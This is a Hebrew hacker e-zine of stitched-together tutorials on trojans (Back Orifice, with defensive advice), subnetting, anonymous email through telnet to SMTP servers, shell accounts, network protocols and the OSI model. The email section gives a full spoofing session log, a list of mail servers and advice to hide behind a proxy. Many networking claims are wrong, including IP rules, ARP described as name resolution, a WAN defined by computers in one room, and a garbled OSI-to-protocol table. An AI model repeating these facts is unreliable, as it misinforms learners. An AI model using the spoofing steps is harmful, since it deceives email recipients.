‫‪.‬לפתוח ולסגור את הסידי‪-‬רום‪ ,‬לשלוט בעכבר‪ ,‬להפעיל תוכניות‪ ,‬לשלוח הודעות‪ ,‬והרבה הרבה יותר‬
‫‪ cdc‬שתוכנת ע"י ]‪[back oriffice‬אחד הטרויינים הפופולריים ביותר בעולם הוא באק אורפיס‬
‫‪ win nt‬והוא כל כך פופולרי‪ ,‬כי הוא מאפשר גישה גם למערכות‬
‫‪.‬וגם קוד המקור שלו שוחרר‪ ,‬ולכן זה עושה אותו אפילו יותר מסוכן‬
‫פתרונות‬
‫```````‬
‫!אל תקבל קבצים מאנשים שאתה לא מכיר‪ ..‬ואם הקובץ נראה לך חשוד‪ ..‬מחוק אותו ישר *‬
‫שמוצאת טרויינים במחשבך ומוחקת אותם "‪ "the cleaner‬ישנה תוכנה נהדרת שנקראת *‬
‫עדכן את האנטי ווירוס שלך כל שבוע *‬
‫\ ‪: sock \ port‬אתה יכול לפתוח את הקובץ לפי שהפעלת אותו דרך הדוס ולחפש מילים חשודות כמו *‬
‫או כל מילה אחרת שנראת לך שיכולה להיות חשודה ‪winsock \ server‬‬
‫(‪ edit filename.exe‬כדיי לפתוח קובץ בדוס‪ :‬פתח את הדוס < כנס לסיפירה של הקובץ < ולחץ)‬
‫דעתי האישית‬
‫לדעתי טרויינים זה לא נקרא פריצה כי אתה לא באמת פורץ‪ .‬אתה רק מנצל אנשים תמימים‪ .‬וגם‬
‫‪,‬אתה לא לומד מזה כלום‬
‫‪.‬וזה ישאיר אותך באשליה שפריצה זה משחק ילדים ושזה קל‬
‫‪..‬אם אתה באמת רוצה לדעת איך דברים פועלים ואיך לפרוץ ולאבטח דברים‬
‫אני ממליץ לך להכנס לאתרים של אבטחה ופריצות וללמוד ולקרוא טקסטים! והרבה! כי בסך הכל‬
‫‪.‬ידע זה כח‬
‫‪--‬‬
‫אתם יכולים להגיב\להעיר\לשאול שאלות בפורום‪ ..‬ואני ישמח לענות‬
‫ואני מקווה שעזרתי לכם להבין מה זה בעצם טרוייני ואיך הוא פועל‬
‫‪by rul3r‬‬
‫סאבנטינג‬
‫‪.‬מה זה סאבנטינג ? רוצים לדעת ? תמשיכו לקרוא‬

‫‪ :‬מספר דברים שכדאי לדעת לפני הקריאה‬
‫‪arp list - list of the all mac )media access control( numbers.‬‬
‫‪rip list - list of all the routers.‬‬
‫‪defaultgateway - the input chip of the router.‬‬
‫כל חומר הכתוב פה הוא למטרות לימודיות בלבד ואין לעשות בו כל פעולה שהיא נגד החוקף‬
‫‪.‬לא שיש מה לעשות אבל בכל מקרה‬
‫‪.‬אני נותן מבט בסיסי כדי שתוכלו להכיר את הרשת שעליה אתם עובדים או ****** אליה‬
‫‪:‬עכשיו אני אתן לכם מבט בסיסי על הנושא שנקרא סבנטינג‬

‫‪,‬סבנטינג‪ :‬חלק מהרשת ‪ ,‬יכול להיות רשת פיזית עצמאית בפני עצמה‬
‫‪,‬המטפלת ב"פלח" מסוים מהבנה של הרשת השלמה‬
‫‪.‬בדרך כלל רשת שכזו חולקת תת כתובת של הרשת השלמה עם שאר הרשתות המישניות‬
‫‪:‬אנא הביטו בתרשים הבא‬
‫_ _ _ _‬
‫|‪|4| |3| |2| |1‬‬
‫_‬
‫|‪|5‬‬
‫_ _ _ _‬
‫|‪|6| |7| |8| |9‬‬
‫‪.‬למשל אנחנו רוצים לשלוח משהו ממחשב ‪ 3‬למחשב ‪ 8‬באופן ישיר‬

‫‪'.‬אם נעשה את זה בדרך הרגילה אז זה יקח זמן‪ ,‬עד שכל מחשב יאשר וכו‬
‫? אבל מה יקרה אם נעשה את זה עם סוד שידור אחר‬
‫? למשל ‪ unicast‬כמו‬
‫‪,‬הוא סוג של שידור אשר לא יעביר הכל דרך כל המחשבים ‪ ? unicast‬אתם שואלים מה זה‬
‫אתם אומרים לו תשלח דאטה למחשב ‪ 8‬ממחשב ‪ 3‬הוא יעשה זאת ללא מעבר דרך המחשבים‪:‬‬
‫‪4,5,6,7.‬‬
‫‪.‬לא עובד אם אותיות‪ ,‬מספרים בלבד ‪ tcp/ip‬כי ‪ netbuei,‬סוג השידור הזה לא עובד אם פרוטוקול‬
‫‪(.‬אם אתם לא מכירים או הפרוטוקול רוצו ללמוד במדריך הקודם שלי)‬
‫‪.‬הוא נתב ‪ ,‬התקן חומרה המנתב הודעות ואינפורמציה ברשת בהתאם לצורתם (‪ )router‬עכשיו‪ ,‬ראוטר‬
‫‪.‬ראוטר הוא לא פריט זול‪ ,‬הוא עולה כ‪ 10,000 -‬דולר בחו"ל‬
‫‪".‬הראוטרים טובים ביותר הם של החברה "סיסקו‬
‫‪,‬לשני גורמים (‪ )ip‬עכשיו נעבור לפירוק האיפי‬

‫‪network id, host id.‬‬
‫‪.‬חוקים לאיפי‪ ,‬אסור שיתחיל ב ‪ ,127‬אסור שיסתיים ב‪225 ,0 -‬‬
‫‪.‬הוא גם מחוץ לטווח‪ .‬אם אתם לא יודעים למה אז תבררו ואז תמשיכו לקרוא ‪127.0.0.1‬‬
‫‪ - network, host , id.‬איך נזהה באיפי מה הוא ה‬
‫(‪: )subnet mask‬הכל מתחלק ל‪ 3‬קבוצות עיקריות‬
‫‪ : ip: z.q.w.x‬דוגמא‬
‫‪z q w x‬‬
‫‪------------------------------‬‬
‫| ‪class a: | n | | h | | h | | h‬‬
‫‪------------------------------‬‬
‫| ‪class b: | n | | n | | h | | h‬‬
‫‪------------------------------‬‬
‫| ‪class c | n | | n | | n | | h‬‬
‫‪------------------------------‬‬
‫‪.‬היא מראה מה זה מה‪ ,‬מה מהם הנטוורק אידי‪ ,‬ומה ההוסט אידי ומבדילה ביניהם ‪subnet mask -‬‬
‫‪- subnet mask.‬עכשיו נעבור לזיהוי ל איפי ללא ה‬
‫=========================================‬
‫|‪class a: | 1 | | 1-127 | | 126 | | 16777214‬‬
‫=========================================‬
‫| ‪class b: | 10| | 128-191 | | 16384 | | 65534‬‬
‫=========================================‬
‫| ‪class c |100| | 192-223 | | 2097152 | | 254‬‬
‫=========================================‬
‫‪:‬דוגמא‬
‫(]‪155.25.69.41 - class b )quz 155 is between 128-191[class b‬‬
‫(]‪215.25.69.41 - class c )quz 215 is between 192-223[class c‬‬
‫(]‪62.25.69.41 - class a )quz 62 is between 1-127[class a‬‬
‫(! ‪377.2.3.5 - not allowed )quz 377 is out of limit‬‬
‫(!‪213.2.2.0 - not allowed )quz ip numbers rn't allowed to end with a 0‬‬
‫‪ .‬מבינים‪ ,‬אם כן יופי‪ ,‬אם לא אז תקראו בסוף זה יקלט ‪ ,‬אני מקווה‬

‫! והנה עוד כמה מושגים שכדאי לדעת לעובדים ברשת‬
‫‪,‬התקן רשת הקובע את נתיב "חבילות" הנתונים אל יעדיהן ברשת ‪switch -‬‬
‫‪.‬קובע את יעד חבילות המידע בתוך הרשת‬
‫‪,‬סוג אי פי נימרץ ‪ ,‬הנפוץ ביותר קיום בעולם ‪dynamic ip -‬‬

‫‪,‬כל פעם כאשר מתחברים לרשת מסוימת נקבע אי פי חדש ושונה‬
‫‪,‬הבעיה בסוג הזה של האי פי הוא שזיהוי של משתמשים‬
‫‪.‬קשה ובילתי יציב‪ ,‬לא ניתן להיסתמך על נתונים מכוון שכשיתחברו מחדש הנתונים ישתנו‬
‫‪ ,‬סוג אי פי נייח ולא דינמי‪ ,‬פחות נפוץ ביותר קיום ‪static ip -‬‬
‫‪,‬מובנה ברוב טכנולוגיות התקשורת החדשות‪ ,‬חיבור הוא היציב ביותר והקל ביותר מבחינת זיהוי‬
‫‪,‬משתמש שהתחבר לרשת ישאר עם אותו אי פי לעולם‬
‫‪.‬לכל מחשב יש אי פי אחד או יותר שמובנים עליו ורק בהם הוא יכול להשתמש‬
‫‪,‬אז אנו מקווה שנהניתם ואנחנו יודעים שאתם בטח אומרים בלב בואנה זה חומר משעמם‬
‫‪.‬אולי הוא משעמים אבל הוא חשוב לכל מי שרוצה להתעסק ברשתות‬
‫‪ .‬רק שתדעו‪ ,‬חצי מהחומר פה מופיע במבחן הגמר של קורס של מיקרוסופט‬
‫‪by pirsing & zeh‬‬

‫דואר אנונימי דרך טלנט‬
‫‪.‬אני יודע שהיום יש תוכנות שעושות את זה‪ ,‬אבל תמיד טוב לדעת שיטות נוספות‬
‫הוא שרת שאחראי על דואר יוצא ודרכו אפשר לשלוח דואר אלקטרוני ‪ smpt‬שרת‬
‫‪(.‬פורט ברירת המחדל שלו הוא ‪)25‬‬
‫‪:‬וככה זה עובד‬
‫מתחברים לשרת דואר יוצא‪1.‬‬

‫‪telnet netvision.net.il 25‬‬
‫‪.‬או כל שרת דואר אחר‬
‫‪:‬ואלו הפקודות‪2.‬‬
‫‪.‬מזהה אותך לפני השרת וקובע שאתה המקור של השליחה ‪ oleh‬או ‪helo -‬‬
‫פעולה שלכאורה לא עושה כלום אבל היא בעצם מחזירה פלט מהשרת אליך וככה אפשר ‪noop -‬‬
‫‪.‬לבדוק אם אתה עדיין מחובר ומה המהירות של החיבור בינך אל השרת‬
‫(אני חושב שזה דיי ברור‪( ...‬מתנתק מהשרת ‪quit -‬‬
‫‪.‬עזרה בקשר לפקודה מסויימת ]‪help - [topic‬‬
‫(יציג רשימה של הפקודות שניתנות לשימוש בשרת‪( .‬בד"כ דומה ברוב השרתים ‪help -‬‬
‫מוחק את כל מה שהכנסתם עד עכשיו‪ ,‬כתובת שולח וכדומה ‪rset - -‬‬
‫כתובת השולח >‪mail from - :<address‬‬
‫‪.‬מכניס את התאריך של כתיבת הדוא"ל ופותח את גוף המכתב ‪data -‬‬
‫‪.‬שולח את המכתב ‪atuh - -‬‬
‫‪: - vrfy rul3r‬בודק אם המשתמש קיים בשרת‪ .‬דוגמא ‪vrfy -‬‬
‫כתובת היעד (ניתן לרשום את הפקודה הזאת יותר מפעם אחת ובכך לשלוח ‪rcpt to:<recipient> -‬‬
‫‪(.‬ליותר מאיש אחד‬
‫?איך לגלות אם קיבלתם דואר מזוייף‬

‫תסתכלו ב‬
‫‪headers‬‬
‫של הדואר ואז אתם רואים את האי פי של מי ששלח אז תסתכלו על‬
‫‪.‬הכתובת של מי ששלח ותראו שזו לא אותה הכתובת‬
‫‪:‬הערות‬
‫‪.‬כל הפעולות שלכם נרשמות ‪ ,‬כולל למי אתם שולחים את האי פי שלכם וכל השאר‪+‬‬
‫בד"כ אם אין פעילות ברוב שרתי הדואר תוך ‪ 60‬שניות הקשר ינותק‪+‬‬
‫‪.‬היום יש תוכנות שעושות את זה‪+‬‬
‫רצוי לעשות את זה מאחורי פרוקסי‪+‬‬
‫לא כדי להשתמש בתוכנות כי לרוב הן לא נותנות להתחבר עם פרוקסי‪+‬‬
‫‪:‬רשימה של שרתי דואר‬

‫‪newmail.net:25 mail.yahoo.com:25‬‬ ‫‪plix.com:25 ids.net:25 student.uq.edu.au:25‬‬
‫‪mail.hotmail.com:25 mail.surfree.net.il:25‬‬ ‫‪istar.ca:25 total.net:25 mail.tfs.net:25‬‬
‫‪out.inter.net.il:25 mail.airmail.net:25‬‬ ‫‪ecis.com:25 mindspring.com:25‬‬
‫‪mail.geocities.com:25 mnsi.net:25‬‬ ‫‪popmail.uc.edu:25 mail.atcon.com:25‬‬
‫‪hacker.com:25 mail.iaw.on.ca:25‬‬ ‫‪future.net:25 aloha.net:25 ovnet.com:25‬‬
‫‪pdx.sisna.com:25 jaring.my:25‬‬ ‫‪connect.reach.net:25 valley-internet.net:25‬‬
‫‪chollian.dacom.co.kr:25 all-yours.net:25‬‬ ‫‪valleynet.com:25 milo.cfw.com:25‬‬
‫‪scs.august.com:25 hiwaay.net:25‬‬
‫הערה ‪ 25:‬זה לא חלק מהשם זה הפורט‬
‫לוג לדוגמה‪ :‬מה שכתוב בתוך ה ‪ /* */‬זה הערות שלי‬

‫‪---‬‬
connected to netvision.net.il on port 25 /*‫*מתחבר לסרבר של נטוויז'ן‬/
220 ftp.netvision.net.il esmtp sendmail 8.9.3/8.9.3; mon, 2 apr 2001 18:47:18 +0200 )ist( /*
‫*מקבל תאריך מלא וגירסא של שרת האימייל שלהם‬/
helo ihc /*‫ מזדהה בשם‬ihc*/
250 ftp.netvision.net.il hello diup-205-209.inter.net.il [213.8.205.209], pleased to meet you /*
‫*מקבל תגובה עם האייפי שנקלט במערכת שלהם‬/
help /*‫*שולח בקשה לעזרה ולראות את כל הפקודות‬/
214-this is sendmail version 8.9.3 ‫*של התוכנה שהשרת מריץ‬/ ‫*גירסא‬/
214-commands: /*‫*מקבל את כל הפקודות‬/
214- helo ehlo mail rcpt data
214- rset noop quit help vrfy
214- expn verb
214-for more info use "help <topic>".
214-to report bugs in the implementation send email to
214- sendmail@cs.berkeley.edu.
214-for local information send email to postmaster at your site.
214 end of help info /*‫*סיים לקבל את הפקודות‬/
mail from: <ihc@netvision.net.il> /*‫*אומר לשרת את הכתובת אימייל שאני רוצה לשלוח ממנה‬/
250 <ihc@netvision.net.il>... sender ok /*‫*מקבל אישור מהשרת‬/
rcpt to: <webmaster@netvision.net.il> /*‫*אומר לשרת למי אני רוצה לשלוח‬/
250 <webmaster@netvision.net.il>... recipient ok /*‫*מקבל אישור מהשרת‬/
data /*‫*שולח פקודה דאטא‬/
354 enter mail, end with "." on a line by itself /*‫מקבל תגובה מהשרת שאומרת לשים נקודה‬
‫*בסוף ההודעה‬/
subject: test /*‫*קובע את נושא ההודעה‬/
hey man /*‫*כותב את ההודעה‬/

whats up?
ihc r0x
. /*‫*כותב נקודה כדיי להגיד לשרת לסגור את ההודעה‬/
250 saa05248 message accepted for delivery /*‫*מקבל אישור מהשרת שההודעה נשלחה‬/
noop /*‫*שולח פקודה "נופ" כדיי לראות שאני עדיין מחובר‬/
250 ok /*‫*מקבל תגובה מהשרת וככה אני יודע שאני עוד מחובר‬/
vrfy ihc /*‫ בודק אם יש בשרת משתמש בשם‬ihc*/
252 cannot vrfy user; try rcpt to attempt delivery )or try finger( /*‫מקבל תגובה שלישית‬
‫*מהשרת שאומרת שאין כזה משתמש‬/
quit /*‫*שולח פקודה יציאה מהשרת‬/
221 ftp.netvision.net.il closing connection /*‫*מקבל הודעת יציאה מהשרת‬/
disconnected from netvision.net.il /*‫*החיבור נותק‬/
by vortex
rul3r‫תיקונים ותוספות‬
‫חשבונות‪shell‬‬
‫‪:‬הקדמה‬
‫======‬
‫המדריך הזה נכתב אחרי מאות בקשות של אנשים שרוצים לדעת מה זה לעזאזל שאלל‪ ,‬לשם מה הוא‬
‫‪.‬נועד‪ ,‬איך משתמשים בו ולמה הוא טוב בכלל; על כל זה נרחיב במדריך הנ"ל‬
‫?מהו חשבון שאלל‬

‫===============‬
‫‪...‬חשבון שאלל הוא בעצם סקריפט‪ ,‬שהלקוח ]אנחנו[‪ ,‬מתחברים אליו בעזרת טלנט פשוט‬
‫שאלל הוא בעצם מערכת יוניקס\לינוקס מרוחקת‪...‬ולפעמים אתה שולט על כל המחשב המרוחק דרך‬
‫‪...‬המחשב הביתי שלך אפילו אם יש לך וינדוס ‪ ,98‬או כל דבר אחר‬
‫וכל דבר אחר שבא לכם לראש‪...‬אבל ‪ ftp,‬דרך השאלל אפשר לגלוש באינטרנט‪ ,‬להתקין שרתי צ'אט‬
‫‪.‬בדרך כלל השרתים הרגילים מאפשרים להריץ עד ‪ 3‬שרתים בו זמנית‬
‫?לשם מה הוא נועד‬

‫================‬
‫חשבון השאלל נועד להרבה מטרות חשובות וחשובות פחות‪ ,‬אבל הוא מיועד בעיקר לאנשים שאין‬
‫להם לינוקס‪ ,‬אבל הם בכל זאת רוצים להשתמש בשירותים שהלינוקס מקנה להם‪ ,‬בלי להתקין אותו‬
‫‪.‬במחשב שלכם‬
‫עוד השאלל משמש ללימוד‪ ,‬צבירת ניסיון בלינוקס ‪-‬כי כל הפקודות בו נכתבות ידנית כי אין לכם‬
‫‪.‬בשאלל שום מסך גראפי כמו בוינדוס‪ ,‬והוא איכשהו מזכיר את מערכת ה‪-‬דוס‬
‫עוד שימוש עיקרי בשאלל הוא כמובן פריצה‪...‬למרות שזה ממש לא חוקי ויכול לסבך אותכם בגדול‪,‬‬
‫!!כי כל האחריות נופלת על בעל השאלל‪ ,‬זה בכל זאת אפשרי ורב כוח‬
‫ואף מגיע ‪ t3‬רוב שרתי השאלל פועלים על פס תקשורת מהיר מאוד‪ ,‬כשבממוצע הוא פועל על מערכות‬
‫שבמילים פשוטות מי שלא יודע מה זה‪ ,‬המכשיר מגיע למהירות של יותר מחמש‪ oc48 -‬להתקנים כמו‬
‫!!ג'יגה‪-‬בייט לשניה‬
‫בשאלל אתם יכולים להתקין שרתים מגוונים‪ ,‬והכל באיכות שרק מערכת יוניקס יכולה לקנות‪-‬‬
‫לכם‪...‬ושלא נדבר על המהירות שאיתה אתם עובדים‪ .‬לעומת זאת‪ ,‬בשאללים שניתנים חינם‪,‬‬
‫האפשרויות מאוד מוגבלות ולא נותנות לכם להריץ בוטים לצ'אטים או שרתים שתופסים הרבה‬
‫זיכרון ועוד הרבה הגבלות אחרות‪ ,‬כך שאם אתם באמת מחליטים להתנסות בשאלל‪ ,‬בלי הפחד של‬
‫להרוס לעצמכם את המחשב אם תתקינו לינוקס‪ ,‬עדיף יהיה לכם לשלם ‪ 8‬עד ‪ 20‬דולרים לחשבון‬
‫!שאלל מתקדם‪ ,‬שייאפשר לכם לעשות בו כמעט כל דבר אפשרי בדיוק כמו במערכת יוניקס רגילה‬
‫פקודות בסיסיות בשאלל‬

‫====================‬
‫טוב‪ ,‬לאלו שלא יודעים דבר ביוניקס\לינוקס ]אותו הדבר[‪ ,‬ניתן כמה פקודות בסיסיות לשימוש‬
‫‪...‬בשאלל שלכם‪..‬כי הפקודות שונות מאלו שאתם מכירים‬
‫‪:‬הערה‬
‫=====‬
‫!במערכות יוניקס יש הבדל בין אותיות גדולות לקטנות‪ ,‬ככה שתקדישו לזה תשומת לב‬
‫‪ -.‬להיכנס לספרייה שאתם רוצים‪...‬בדיוק אותה הפקודה המוכרת ממערכת הדוס ‪cd‬‬
‫‪. -‬שנותן לכם לראות את תוכן הקובץ אותו אתם כותבים לצפייה ‪cat‬‬
‫‪.‬פקודה האומרת לתוכנה להוריד את הקובץ מהלינק אותו תכתבו לידה ‪wget -‬‬
‫זוהי =תוכנה= אמיתית‪ ,‬כמובן בלי שום גראפיקה‪ ,‬ככה שאל תבהלו‪ ,‬אבל זהו דפדפן ‪lynx -‬‬
‫!האינטרנט המהיר ביותר בעולם‪....‬כי הוא פותח אתרים בצורה טקסטואלית‬
‫!שוב =תוכנה= שנותנת לכם לערוך קבצי טקסט‪ ,‬לתכנת!‪ ,‬ועוד הרבה אפשרויות אחרות ‪emacs- -‬‬
‫‪ .gz‬פקודה לפתיחת קובץ מכווץ שאתם מורידים מהאינטרנט מסוג ‪gzip - -‬‬
‫‪ .‬והוא פותח קבצים מכווצים מסוג ‪ -gzip‬זהו עוד כיווץ שבא בדרך כלל בייחד עם ה ‪tar - tar -‬‬
‫‪ -‬פקודה מוכרת לכולנו‪...‬אין צורך לפרט אני חושב ‪dir‬‬
‫‪...‬הקומפיילר לשפת ה שאי אפשר לזוז בלעדיו כמעט בלינוקס ‪gcc - c\c++‬‬
‫‪:‬עוד חשוב לציין‪ ,‬שאפשר לראות את העזרה לפקודות\תוכנות המבוקשות בעזרת פקודת‬
‫‪help--command‬‬
‫!עם רווח בין שני הפקודות‬
‫אם אתם רוצים לקרוא יותר לעומק את הפקודות או כל דבר אחר לתפעול הלינוקס‪ ,‬השתמשו‬
‫‪:‬בפקודת‬
‫‪man‬‬
‫‪.‬וליידה את הפקודה\תוכנה\כל דבר אחר שעליו אתם רוצים לקרוא עוד‬
‫טוב‪ ,‬עכשיו אתם בטח רוצים כמה כתובת מאיפה אפשר להשיג שאללים‪ ,‬אז הנה‪ ,‬ניתן לכם כמה‬
‫‪...‬כתובת של שאללים חינמים שלא מומלצים כל‪-‬כך‪ ,‬אבל בכל זאת‬
‫‪nether.net‬‬
‫‪freeshell.org‬‬
‫אני לא יודע אם עדיין יש שם רשימות של שאללים‪ ,‬אבל בכל זאת‪www.cyberarmy.com/lists -‬‬
‫!תנסו‬
‫‪ efnet, dalnet‬שאללים בתשלום אפשר למצוא דרך שרתי הצ'אט של‬

‫‪: #shells, shell,bouncers‬בחדרים‬
‫!שנותנים לכם המון מקומות לקניית שאללים טובים‬
‫‪:‬אם אתם בכל זאת לא יודעים איך להתחבר לשאלל שלכם‪ ,‬אז הנה‬
‫בפורט ‪telnet yourshellhere - 23‬‬
‫פרוטוקולים‪.‬‬
‫קודם כל נתחיל אם סוגי הפרוטוקולים הקיימים ומה הם עושים‪.‬‬
‫הערה קטנה לפני שנתחיל‪ ,‬שני סוגי הרשתות הקיימות‪.‬‬

‫רשת מקומית ‪lan -‬‬
‫‪.‬רשת שמשתרעת על יותר מ‪ 12‬מחשבים באותו חדר ‪wan -‬‬
‫כל הפרוטוקולים מתחלקים לשני סוגים‪.‬‬

‫הוא פרוטוקול אשר שולח הודעה‪/‬מידע או כל דבר אחר ללא המתנה ‪1.connectionless protocol -‬‬
‫‪.‬לאישור מהנמען‪ .‬ככה הפרוטוקול עובד מהר יותר והוא גמיש יותר‬
‫הוא פרוטוקול אשר שולח הודעה‪/‬מידע למחשב אחר והוא ‪2.connection oriented protocol -‬‬
‫ממתין לאישור הנמען‪ ,‬הפרוטוקול הנ"ל מאובטח ביותר והעברת הנתונים תהיה איטית יותר‬
‫‪.‬בגלל ההמתנה לתשובה‬
‫עכשיו נעבור לעבודת הפרוטוקולים תחת המודלים של ה ‪.osi -‬‬

‫‪osi‬‬ ‫‪ips‬‬
‫‪application‬‬ ‫‪not specified‬‬
‫‪presentation‬‬ ‫‪arp, rarp‬‬
‫‪session‬‬ ‫‪ip‬‬
‫‪transport‬‬ ‫‪tcp, udp‬‬
‫‪network, data link, physical‬‬ ‫‪telnet, ftp, smtp, snmp, http‬‬
‫יש פרוטוקול אשר יוצא דופן מהשאר‪ ..‬בגלל שהוא עובד על המרת תווים למספרים‪.‬‬
‫‪arp - address resolution protocol.‬‬
‫ויש אחד אשר עובד על העברת חדשות ‪ ,‬אבל הוא לא ממש מעניין‪.‬‬
‫‪nntp - network news transport protocol.‬‬
‫פה אני אתן רשימה של פרוטוקולים שלא נמצאים בשימוש ע"י כל אחד‪ ,‬אבל שימושיים לאלה‬
‫שעובדים איתם‪.‬‬
‫! שם הפרוטוקול‬ ‫? מה הוא עושה‬
‫‪icmp - internet control message protocol‬‬ ‫משמש לבקרת שגיאות‬
‫‪dhcp - dynamic host configuration‬‬ ‫באופן ידני לרשת ‪ ip‬הקצאת‬
‫‪protocol‬‬
‫‪rip - routing information protocol‬‬ ‫‪ - tcp/ip‬קביעת וקטור המסלולים ב‬
‫‪smb - server message box‬‬ ‫‪ - redirector‬משמש כ‬
‫‪netbios - working under session‬‬ ‫(‪ )ip‬משמש ל‪-‬קלט‪/‬פלט של שמות‬
‫‪netbeui - working under transport‬‬ ‫‪ - routing‬רק שזה לא תומך ב ‪ netbios‬כמו‬
‫‪message‬‬
‫‪wins - windows internet naming service‬‬ ‫‪- ip.‬מערכת לתרגום שמות ל‬
‫עכשיו נעבור לפרוטוקולים הנפוצים יותר והשימושיים יותר‪.‬‬
‫! שם הפרוטוקול‬ ‫? מה הוא עושה‬

‫‪ppp - point to point protocol‬‬ ‫‪.‬קשר מנקודה לנקודה‬
‫‪slip - serial line internet protocol‬‬ ‫‪ - ppp‬עושה פעולה אחת לפני ה‬
‫‪cslip - compress serial line internet‬‬ ‫‪.‬רק בצורה דחוסה ‪ - ppp,‬ה ‪-"- -"- -"-"-‬‬
‫‪ftp - file transfer protocol‬‬ ‫(‪. )transport‬הורדת קבצים והעלאת קבצים‬
‫‪telnet - terminal networking‬‬ ‫‪.‬פרוטוקול לעבודה בין מסופים‬
‫‪smtp - simple mail transfer protocol‬‬ ‫‪.‬פרוטוקול לדואר נכנס‪/‬יוצא‬
‫‪http - hypertext transfer protocol‬‬ ‫'פרוטוקול לאינטרנט היפר‪-‬טקסט‪ .‬אתרים וכו‬
‫‪snmp - simple network management‬‬ ‫‪.‬פרוטוקול לניהול פשוט של הרשת‬
‫‪udp - user datagram protocol‬‬ ‫‪.‬עוזר להעברת חבילות גדולות של מידע‬
‫‪tcp - transmission control protocol‬‬ ‫‪.‬משמש להעברת‪/‬קבלת ‪.‬נתונים‬
‫‪ip - internet protocol‬‬ ‫‪.‬משמש לתקשורת לאינטרנט‬
‫‪tcp / ip - transmission control‬‬ ‫חבילת פרוטוקולים נפוצה אשר משמשת כדי‬
‫‪protocol/internet protocol‬‬ ‫‪.‬לגלוש לרשת האינטרנט‬
‫ישנו כמו מין דבר מעיק כזה‪ ,‬שאני לא יודע אם לקרוא לזה באג בפרוטוקול הנפוץ ביותר בעולם‪.‬‬
‫ה‪ ,tcp/ip -‬כאשר אתה משתמש בפרוטוקול לשליחת מידע אז‪ ,‬בכל פעם שאתה שולח מידע בחבילה‬
‫אז אתה גם מוריד חבילה באותו זמן‪ ,‬בלי ידיעתך‪ .‬אז זה מקשה משפיע על קצב העברת הנתונים ממך‬
‫אל נמען אחר…‪.‬‬
‫הפרוטוקול הנ"ל אינו מסוגל לקרוא אותיות‪ ,‬רק ספרות ]מספרים[‪ ,‬כגון (‪()203.201.023.0‬כתובות ‪,)ip‬‬
‫אז בכל מחשב שמשתמש בפרוטוקול זה ישנו גם פרוטוקול שאחראי על המרת האותיות למספרים‪.‬‬
‫הוא נקרא‪:‬‬
‫‪.arp - address resolution protocol‬‬
‫כל תהליך ההמרה מתחיל ככה‪:‬‬

‫‪1.netbios cache, 2.wins, 3.broadcast, 4.lmhost file, 5.host file, 6. dns.‬‬
‫‪2‬דוגמא‪:‬‬
‫הוא קולט את האותיות ומתחיל בהמרה ‪•bioscache = [www.walla.co.il] -‬‬
‫‪.‬המנגנון הממיר את האותיות למספרים‪ ,‬הוא מתחיל בפענוח האותיות ‪•wins -‬‬
‫‪.‬שידור של אות ‪•broadcast -‬‬
‫‪.‬ממיר אותיות למספרים ולהיפך‪ .‬במקרה שלנו מאותיות למספרים ‪•lmhost file -‬‬
‫‪.‬קובץ מארח ע"פי הנתונים של ה קובץ מעל ‪•host file -‬‬
‫הפלט של ההמרה ‪•dns = [192.118.70.2] -‬‬
‫ככה עובד הפרוטוקול הידוע והנפוץ ‪.tcp/ip‬‬

‫‪-----------------------------------------------------------------------------------------------‬‬
‫נעבור לשני הגדרות שהם קצת יותר מתקדמות בעבודה ברשת‪.‬‬
‫‪odi - open datalink interface & open device interconnect.‬‬
‫‪ndis - network driver/device interface specification.‬‬
‫‪.‬צורת הצגה של העברת נתונים פתוחים ‪odi -‬‬
‫‪.‬ממשק למנהלי רשת בסביבת חלונות ‪ndis -‬‬
‫מבוא לשכבת ‪osi‬‬
‫ה‪ osi-‬הוצא לאור ב ‪ 1978‬ע"י ה‪ ( iso-‬ארגון התקנים הבינלאומי)‬

‫ה‪ osi-‬מגדיר את פונקציות התקשורת בין מחשבים במונחים של שבע שכבות‪.‬‬
‫הרעיון של ‪ osi‬הוא שמערכות שונות יוכלו לתקשר ביניהן בעזרת פרוטוקולים וממשקים ששתי‬
‫המערכות מבינות‪.‬‬
‫כשארגון התקנים הבינלאומי יצר את ה‪ osi-‬הוא חילק את פונקציות הרשתות לשבעה שכבות והן‪:‬‬
‫______________‬
‫| ‪| application‬‬
‫|______________|‬
‫| ‪| presentation‬‬
‫|______________|‬
‫| ‪| session‬‬
‫|______________|‬
‫| ‪| transport‬‬
‫|______________|‬
‫| ‪| network‬‬
‫|______________|‬
‫| ‪| data link‬‬
‫|______________|‬
‫| ‪| physical‬‬
‫|______________|‬
‫עכשיו אני אסביר על כל שכבה‪.‬‬
‫* שכבת ‪physical‬‬
‫השכבה הזאת היא בעצם הדברים הפיזיים‪ ,‬שאפשר לגעת בהם כגון כבלים היא גם מגדירה כל מיני‬
‫דברים‬
‫כמו פינים בכבלים‪.‬‬
‫* שכבת ‪data link‬‬

‫שכבה זו מספקת העברת נתונים מנקודה לנקודה השכבה גם מספקת טיפול בבעיות בהעברת‬
‫הנתונים‪.‬‬
‫* שכבת ‪network‬‬
‫השכבה הזאת מאפשרת העברת נתונים בין השכבות‪ ,‬השכבה הזאת יכולה לנווט ולשלוט בחבילות‪.‬‬
‫יש עוד תפקיד לשכבה שהוא לתת כתובת לחבילות שנוצרו ע"י השכבה ‪ transport‬שנסביר עליה תיכף‬
‫אתם‬
‫כבר תבינו למה היא נותנת להם כתובת‪.‬‬
‫* שכבת ‪transport‬‬
‫נגיד שאתה רוצה לשלוח מכתב לשרת מסויים אבל הוא שני דפים אז אתה שולח אותו בשני חבילות‪,‬‬
‫השכבה הזאת ממספרת את החבילות מצד השולח והוא בודק שהם מסודרות לפי סדר השליחה לפני‬
‫שהוא מרכיב‬
‫הכל לדבר אחד‪.‬‬
‫* שכבת ‪session‬‬
‫כששני יישומים ברשת מתקשרים זה עם זה תפקיד השכבה הוא לקבוע איזה יישום מדבר ואיזה‬
‫ישיב‪,‬‬
‫השכבה גם מפקחת על כל מיני דברים אחרים למשל שפתאום החיבור לאינטרנט התנתק אז השכבה‬
‫הזאת היא‬
.‫זאתי שמתריעה אותך שהחיבור לאינטרנט התנתק‬
presentation ‫* שכבת‬
‫ היא משמשת גם להצפנה וגם לדחיסת נתונים כדי‬,‫השכבה הזו בעצם מכינה את ההודעות לשידור‬
‫שהעברה‬
.‫תהיה מהירה יותר‬
application ‫* שכבת‬
‫ כמו להוריד נתונים‬,‫זוהי השכבה שבה אתה מבקש מה לעשות ומערכת ההפעלה עושה את זה‬
‫ממחשב אחר‬
